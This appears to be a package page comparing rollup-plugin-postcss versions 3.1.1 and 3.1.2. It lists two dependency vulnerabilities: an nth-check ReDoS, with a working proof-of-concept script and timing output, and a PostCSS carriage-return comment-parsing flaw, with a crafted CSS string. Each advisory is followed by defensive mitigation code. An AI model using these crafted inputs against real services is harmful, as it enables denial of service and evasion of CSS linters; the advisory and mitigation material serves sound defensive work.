rollup-plugin-postcss is a valuable tool for developers seeking seamless integration between Rollup and PostCSS in their projects. Version 3.1.2, released on June 4th, 2020, builds upon the foundation laid by the previous stable version, 3.1.1, released on April 24th, 2020. While both versions share core functionalities, dependencies, and development tools, subtle differences exist, primarily in the dist section and release date. The dist object reveals that version 3.1.2 has a slightly smaller unpacked size (38560 bytes) compared to version 3.1.1 (38562 bytes), even though both packages contain the same number of files. This minor difference might indicate small optimizations or changes in the build process.
For developers, both versions offer a robust solution for processing CSS with PostCSS within the Rollup ecosystem. Key features include handling various CSS-related transformations, such as autoprefixing, minification (using cssnano), and CSS Modules. The plugin relies on dependencies like "postcss-load-config", which enables developers to effortlessly load their existing PostCSS configurations. The "style-inject" dependency ensures that processed CSS is seamlessly injected into the document. Developers already familiar with Rollup and PostCSS can easily integrate this plugin into their workflow, leveraging the power of both tools for optimized and maintainable CSS. Choosing between version 3.1.1 and 3.1.2 might depend on specific project requirements, but both versions remain viable options for modern web development.
All vulnerabilities related to version 3.1.2 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = '2n' + ' '.repeat(i*10000)+"!";
  try {
    nthCheck.parse(attack_str)
  }
  catch(err) {
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
  }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
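The timings above grow superlinearly because the regex backtracks over the run of whitespace before concluding that the trailing "!" cannot match. The following is an added example, not code from nth-check or rollup-plugin-postcss: a single-pass parser for the CSS An+B microsyntax that advances one index and never backtracks, so its cost is linear in the input length, plus a length-capped wrapper for untrusted input. It accepts "odd", "even", "An+B", "An-B", "An" and "B" (a sign is required before B, as in the CSS grammar, so it is stricter than nth-check's regex); the names parseNthLinear, parseUntrustedNth and the MAX_NTH_LENGTH value are assumptions of this example.

```javascript
// Added example (not nth-check's own code): a backtracking-free parser for the
// CSS An+B microsyntax. Every character is visited at most once, so rejecting a
// string such as "2n" + many spaces + "!" takes one scan rather than seconds.

const WHITESPACE = new Set([' ', '\t', '\n', '\r', '\f']);
const isDigit = (c) => c >= '0' && c <= '9';

// Parse "odd", "even", "An+B", "An-B", "An" or "B" into [a, b].
// Throws SyntaxError on anything else.
function parseNthLinear(input) {
  if (typeof input !== 'string') throw new TypeError('expected a string');
  const s = input.toLowerCase();
  const n = s.length;
  let i = 0;

  const fail = () => {
    throw new SyntaxError(`Invalid An+B expression: ${JSON.stringify(input)}`);
  };
  const skipWhitespace = () => { while (i < n && WHITESPACE.has(s[i])) i++; };
  const readDigits = () => {
    const start = i;
    while (i < n && isDigit(s[i])) i++;
    return s.slice(start, i);
  };

  skipWhitespace();
  // Keywords first: apart from "n" they are the only alphabetic forms.
  if (s.startsWith('odd', i) || s.startsWith('even', i)) {
    const word = s.startsWith('odd', i) ? 'odd' : 'even';
    i += word.length;
    skipWhitespace();
    if (i !== n) fail();
    return word === 'odd' ? [2, 1] : [2, 0];
  }

  // Optional sign and digits of the first term.
  let sign = 1;
  if (s[i] === '+') i++;
  else if (s[i] === '-') { sign = -1; i++; }
  const firstDigits = readDigits();

  let a = 0;
  let b = 0;
  if (i < n && s[i] === 'n') {
    // "An": a missing coefficient means 1 (as in "n" or "-n").
    a = sign * (firstDigits === '' ? 1 : parseInt(firstDigits, 10));
    i++;
    skipWhitespace();
    if (i < n) {
      // After "An" only a signed B may follow, e.g. "2n + 1" or "2n-1".
      if (s[i] !== '+' && s[i] !== '-') fail();
      const bSign = s[i] === '-' ? -1 : 1;
      i++;
      skipWhitespace();
      const bDigits = readDigits();
      if (bDigits === '') fail();
      b = bSign * parseInt(bDigits, 10);
    }
  } else {
    // No "n": the whole expression is B.
    if (firstDigits === '') fail();
    b = sign * parseInt(firstDigits, 10);
  }

  skipWhitespace();
  if (i !== n) fail();
  return [a, b];
}

// Cheap first line of defence in front of any parser, regex-based or not:
// real An+B expressions are a handful of characters, so cap the length.
const MAX_NTH_LENGTH = 64; // assumed bound for this example
function parseUntrustedNth(input) {
  if (input.length > MAX_NTH_LENGTH) {
    throw new RangeError(`An+B expression too long (${input.length} > ${MAX_NTH_LENGTH})`);
  }
  return parseNthLinear(input);
}

// Demo: input shaped like the proof of concept above (constructed here) is
// rejected after a single pass.
const demoInput = '2n' + ' '.repeat(200000) + '!';
const t0 = Date.now();
try { parseNthLinear(demoInput); } catch (e) { console.log(e.name, 'after', Date.now() - t0, 'ms'); }
console.log(parseNthLinear('2n + 1'), parseNthLinear('odd'), parseNthLinear('-n+3'));
```

The length cap is the part worth copying even if you keep the library: a selector engine never needs a 10,000-character nth expression, and rejecting long input before it reaches a regex removes the quadratic case regardless of which regex is in use. Upgrading nth-check to a version with the patched pattern remains the actual fix.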
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
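The demonstration string above places a lone carriage return (a \r that is not part of \r\n) immediately before a comment opener. The following is an added example, not PostCSS's own code: line-ending hygiene for CSS that arrives from an untrusted source, applied before the text reaches a parser or linter. It reports the offsets of lone carriage returns so a linter can flag or refuse the input, and normalises every line ending to \n so that the tokenizer and the consumer see the same line breaks. The function names and the strict/permissive option are assumptions of this example.

```javascript
// Added example (not PostCSS's own code): detect and normalise lone carriage
// returns in CSS before handing it to a parser.

// Return the offsets of every \r that is not followed by \n.
function findLoneCarriageReturns(css) {
  const offsets = [];
  for (let i = 0; i < css.length; i++) {
    if (css[i] === '\r' && css[i + 1] !== '\n') offsets.push(i);
  }
  return offsets;
}

// Rewrite \r\n and lone \r to \n so every consumer sees the same line breaks.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Gate for untrusted CSS. strict: reject input containing lone CRs (a linter
// that must not be fooled). permissive: normalise and continue (a build step).
function prepareUntrustedCss(css, { strict = false } = {}) {
  const lone = findLoneCarriageReturns(css);
  if (strict && lone.length > 0) {
    throw new Error(`lone carriage return at offset(s) ${lone.join(', ')}`);
  }
  return normalizeLineEndings(css);
}

// Constructed sample built from the advisory's demonstration string.
const SAMPLE_CSS = '@font-face{ font:(\r/*);}\n';

console.log(findLoneCarriageReturns(SAMPLE_CSS));            // [18]
console.log(JSON.stringify(prepareUntrustedCss(SAMPLE_CSS))); // \r replaced by \n
```

This is a belt-and-braces check for inputs you do not control, not a substitute for upgrading PostCSS to 8.4.31 or later; once line endings are uniform, the comment boundaries PostCSS sees and the ones a reviewer sees reading the file are the same.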